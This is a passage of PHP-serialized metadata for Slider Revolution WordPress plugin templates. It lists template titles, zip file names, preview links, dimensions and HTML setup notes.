Carousel\";s:5:\"alias\";s:13:\"food-carousel\";s:3:\"zip\";s:17:\"food-carousel.zip\";s:3:\"uid\";s:32:\"a7bf54527b6658a0a308c70c729779fe\";s:3:\"img\";s:29:\"foodcarousel/slider_cover.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/food-carousel-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:267:\"<span class=\"ttm_content\">A fancy carousel with detail content on each slide. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> are used to show and hide layers.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:371:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:39;a:22:{s:2:\"id\";s:2:\"40\";s:5:\"title\";s:14:\"Rotating Words\";s:5:\"alias\";s:14:\"rotating-words\";s:3:\"zip\";s:18:\"rotating-words.zip\";s:3:\"uid\";s:32:\"70190463d9376f278c8197b7b2ef6c1b\";s:3:\"img\";s:24:\"rotatingwords/slide1.jpg\";s:7:\"preview\";s:53:\"http://revolution.themepunch.com/rotating-words-hero/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:134:\"<span class=\"ttm_content\">A full-screen hero block with unique animated text and blur effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:495:\"<span class=\"ttm_content\">This is a \"Default\" hero slider. Edit the slide to change the background media and texts.<br/>For further configuration options please view the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">\"Custom CSS/JS\"</a> section in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:40;a:22:{s:2:\"id\";s:2:\"41\";s:5:\"title\";s:22:\"Travel Static Captions\";s:5:\"alias\";s:22:\"travel-static-captions\";s:3:\"zip\";s:26:\"travel-static-captions.zip\";s:3:\"uid\";s:32:\"bbe7d61c7c741ebc7aa1ce1082b0cb71\";s:3:\"img\";s:33:\"travel-static-captions/slide1.jpg\";s:7:\"preview\";s:50:\"http://revolution.themepunch.com/travel-slideshow/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:148:\"<span class=\"ttm_content\">A slideshow example with static captions layers above a rotating image background.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:41;a:22:{s:2:\"id\";s:2:\"42\";s:5:\"title\";s:7:\"Concept\";s:5:\"alias\";s:7:\"concept\";s:3:\"zip\";s:11:\"concept.zip\";s:3:\"uid\";s:32:\"47cb06083e87503762f6746725117a3c\";s:3:\"img\";s:18:\"concept/slide1.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/fullscreen-wordpress-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">A full-screen slider that uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to their potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:371:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:42;a:22:{s:2:\"id\";s:2:\"43\";s:5:\"title\";s:15:\"True Fullscreen\";s:5:\"alias\";s:17:\"fullscreen-button\";s:3:\"zip\";s:21:\"fullscreen-button.zip\";s:3:\"uid\";s:32:\"618a43bdf89333b555531f6d6ecde359\";s:3:\"img\";s:28:\"fullscreen-button/slide1.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/wordpress-sidebar-slideshow/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:246:\"<span class=\"ttm_content\">A slider with a full-screen button that uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to their potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:297:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change the background images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:43;a:22:{s:2:\"id\";s:2:\"44\";s:5:\"title\";s:16:\"Creative Freedom\";s:5:\"alias\";s:15:\"creativefreedom\";s:3:\"zip\";s:19:\"creativefreedom.zip\";s:3:\"uid\";s:32:\"8902bf6c93126c2c6323626b9e872621\";s:3:\"img\";s:26:\"creativefreedom/slide1.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/wordpress-touch-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A full-screen slider with a unique vertical navigation and 3D-parallax effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:290:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images, videos and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:44;a:22:{s:2:\"id\";s:2:\"45\";s:5:\"title\";s:17:\"3D Parallax Scene\";s:5:\"alias\";s:13:\"parallaxscene\";s:3:\"zip\";s:17:\"parallaxscene.zip\";s:3:\"uid\";s:32:\"51566f1ce649708e97a0f5dfaf05ea19\";s:3:\"img\";s:24:\"parallaxscene/slide1.jpg\";s:7:\"preview\";s:55:\"http://revolution.themepunch.com/wordpress-3d-parallax/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"700\";s:11:\"description\";s:328:\"<span class=\"ttm_content\">A 3D-parallax hero scene with mouse-controlled effects. Smart image arrangement creates a convincing 3D effect. Tooltips are shown using <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a>.</span>\r\n</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:45;a:22:{s:2:\"id\";s:2:\"46\";s:5:\"title\";s:10:\"Wow Factor\";s:5:\"alias\";s:15:\"slidingoverlays\";s:3:\"zip\";s:19:\"slidingoverlays.zip\";s:3:\"uid\";s:32:\"18002d17e8bc7ca61b0951f5305a759e\";s:3:\"img\";s:26:\"slidingoverlays/slide1.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/responsive-wordpress-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:106:\"<span class=\"ttm_content\">A 3D-parallax effect full-screen slider.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:446:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:46;a:22:{s:2:\"id\";s:2:\"47\";s:5:\"title\";s:14:\"3D Web Product\";s:5:\"alias\";s:25:\"web-product-light-hero-3d\";s:3:\"zip\";s:29:\"web-product-light-hero-3d.zip\";s:3:\"uid\";s:32:\"efd345c5da805414093e46066cefd751\";s:3:\"img\";s:36:\"web-product-light-hero-3d/slide1.jpg\";s:7:\"preview\";s:52:\"http://revolution.themepunch.com/wordpress-3d-scene/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"668\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A 3D-parallax hero scene slider with a convincing depth-effect and animated clouds.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:47;a:22:{s:2:\"id\";s:2:\"48\";s:5:\"title\";s:15:\"WooCommerce Big\";s:5:\"alias\";s:6:\"woobig\";s:3:\"zip\";s:10:\"woobig.zip\";s:3:\"uid\";s:32:\"bfb09a39656c7c80e86b468fc5b3403c\";s:3:\"img\";s:17:\"woobig/slide1.jpg\";s:7:\"preview\";s:52:\"http://revolution.themepunch.com/woocommerce-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:173:\"<span class=\"ttm_content\">This slider is automatically populated by WooCommerce posts. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"WooCommerce Slider\"</a>. Make sure to select the products you want to show in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:9:\"postbased\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:48;a:22:{s:2:\"id\";s:2:\"49\";s:5:\"title\";s:17:\"WooCommerce Small\";s:5:\"alias\";s:16:\"woocommercesmall\";s:3:\"zip\";s:20:\"woocommercesmall.zip\";s:3:\"uid\";s:32:\"b17c2adcc5c4c4b68a7ac6fee32fa030\";s:3:\"img\";s:27:\"woocommercesmall/slide1.jpg\";s:7:\"preview\";s:52:\"http://revolution.themepunch.com/woocommerce-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:3:\"400\";s:6:\"height\";s:3:\"266\";s:11:\"description\";s:174:\" <span class=\"ttm_content\">This slider is automatically populated by WooCommerce posts. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"WooCommerce Slider\"</a>. Make sure to select the products you want to show in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:9:\"postbased\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:49;a:22:{s:2:\"id\";s:2:\"50\";s:5:\"title\";s:17:\"Restaurant Header\";s:5:\"alias\";s:10:\"finedining\";s:3:\"zip\";s:14:\"finedining.zip\";s:3:\"uid\";s:32:\"03481a9e258501fbe3888b48830ea845\";s:3:\"img\";s:21:\"finedining/slide1.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/restaurant-hero-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:275:\"<span class=\"ttm_content\">A full-screen hero block slider that shows different background layers on button hover using <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a>.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:464:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:50;a:22:{s:2:\"id\";s:2:\"51\";s:5:\"title\";s:21:\"Agency Website Header\";s:5:\"alias\";s:12:\"agency-intro\";s:3:\"zip\";s:16:\"agency-intro.zip\";s:3:\"uid\";s:32:\"e9be2afdd55a0c8d0d8d0cc12ba4c82f\";s:3:\"img\";s:23:\"agency-intro/slide1.jpg\";s:7:\"preview\";s:60:\"http://revolution.themepunch.com/agency-website-hero-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:302:\" <span class=\"ttm_content\">A full-screen hero block slider with ken burns effect and video modal on button click. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> are used to achieve this effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:371:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:51;a:22:{s:2:\"id\";s:2:\"52\";s:5:\"title\";s:11:\"Team Slider\";s:5:\"alias\";s:7:\"ourteam\";s:3:\"zip\";s:11:\"ourteam.zip\";s:3:\"uid\";s:32:\"d8eb1fec07a79202d1118bb17f70c233\";s:3:\"img\";s:18:\"ourteam/slide1.jpg\";s:7:\"preview\";s:74:\"http://revolution.themepunch.com/thumbnail-hover-slider-revolution-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.4\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:303:\"<span class=\"ttm_content\">A team slider that changes slides and displays additional information on thumbnail hover. It uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to achieve this effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:657:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\nLearn how to <a href=\"https://www.themepunch.com/faq/modify-thumbnails-for-our-team-template/\" target=\"_blank\">modify the thumbnails</a><br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:52;a:22:{s:2:\"id\";s:2:\"53\";s:5:\"title\";s:13:\"Team Carousel\";s:5:\"alias\";s:17:\"our-team-carousel\";s:3:\"zip\";s:21:\"our-team-carousel.zip\";s:3:\"uid\";s:32:\"37656d5dcab1f265c025cb2a3d669809\";s:3:\"img\";s:26:\"ourteamcarousel/slide1.jpg\";s:7:\"preview\";s:83:\"http://revolution.themepunch.com/thumbnail-hover-carousel-slider-revolution-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.4\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:306:\" <span class=\"ttm_content\">A team carousel that changes slides and displays additional information on thumbnail hover. It uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to achieve this effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:659:\"<span class=\"ttm_content\">This is a \"Default\" content carousel. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\nLearn how to <a href=\"https://www.themepunch.com/faq/modify-thumbnails-for-our-team-template/\" target=\"_blank\">modify the thumbnails</a><br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:53;a:22:{s:2:\"id\";s:2:\"54\";s:5:\"title\";s:17:\"4K Youtube Slider\";s:5:\"alias\";s:13:\"betteryoutube\";s:3:\"zip\";s:17:\"betteryoutube.zip\";s:3:\"uid\";s:32:\"d7c5fef9f257037d7a148038aa2a1857\";s:3:\"img\";s:24:\"betteryoutube/slide1.jpg\";s:7:\"preview\";s:94:\"http://revolution.themepunch.com/fullscreen-4k-youtube-video-gallery-slider-revolution-plugin/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.1.4\";s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:3:\"675\";s:11:\"description\";s:293:\" <span class=\"ttm_content\">A full-screen youtube gallery with 4K videos as an example. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> are used to breathe life into navigation elements.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:535:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change videos and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:54;a:22:{s:2:\"id\";s:2:\"55\";s:5:\"title\";s:21:\"Agency Website Header\";s:5:\"alias\";s:19:\"agencywebsiteheader\";s:3:\"zip\";s:23:\"agencywebsiteheader.zip\";s:3:\"uid\";s:32:\"c11d272c87277a7a38d9e7fd13e27947\";s:3:\"img\";s:30:\"agencywebsiteheader/slide1.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/fullscreen-hero-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:245:\" <span class=\"ttm_content\">A very unique full-screen slider that uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to their potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:509:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:55;a:22:{s:2:\"id\";s:2:\"56\";s:5:\"title\";s:11:\"Coming Soon\";s:5:\"alias\";s:10:\"comingsoon\";s:3:\"zip\";s:14:\"comingsoon.zip\";s:3:\"uid\";s:32:\"0f89edf995512e6d6e864a2ee7221829\";s:3:\"img\";s:21:\"comingsoon/slide1.jpg\";s:7:\"preview\";s:79:\"http://revolution.themepunch.com/coming-soon-wordpress-under-construction-site/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:299:\"<span class=\"ttm_content\">A full-screen slider that can be used as a \"Coming Soon\" page. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> are used to achieve various interaction possibilities.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:638:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>For further configuration options please view the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">\"Custom CSS/JS\"</a> section in the slider settings.<br/><br/></span>\r\nInstructions for <a href=\"https://www.themepunch.com/faq/change-date-for-coming-soon-template/\" target=\"_blank\">how to change the date.</a><br /><br />\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:56;a:22:{s:2:\"id\";s:2:\"57\";s:5:\"title\";s:20:\"Christmas Snow Scene\";s:5:\"alias\";s:9:\"snowscene\";s:3:\"zip\";s:13:\"snowscene.zip\";s:3:\"uid\";s:32:\"a747bf0837caff86c62419a746690209\";s:3:\"img\";s:20:\"snowscene/slide1.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/christmas-snow-scene/\";s:7:\"version\";s:5:\"1.0.5\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:141:\"<span class=\"ttm_content\">A slider with multiple christmas themed slides and a neat snow fall effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:485:\"<span 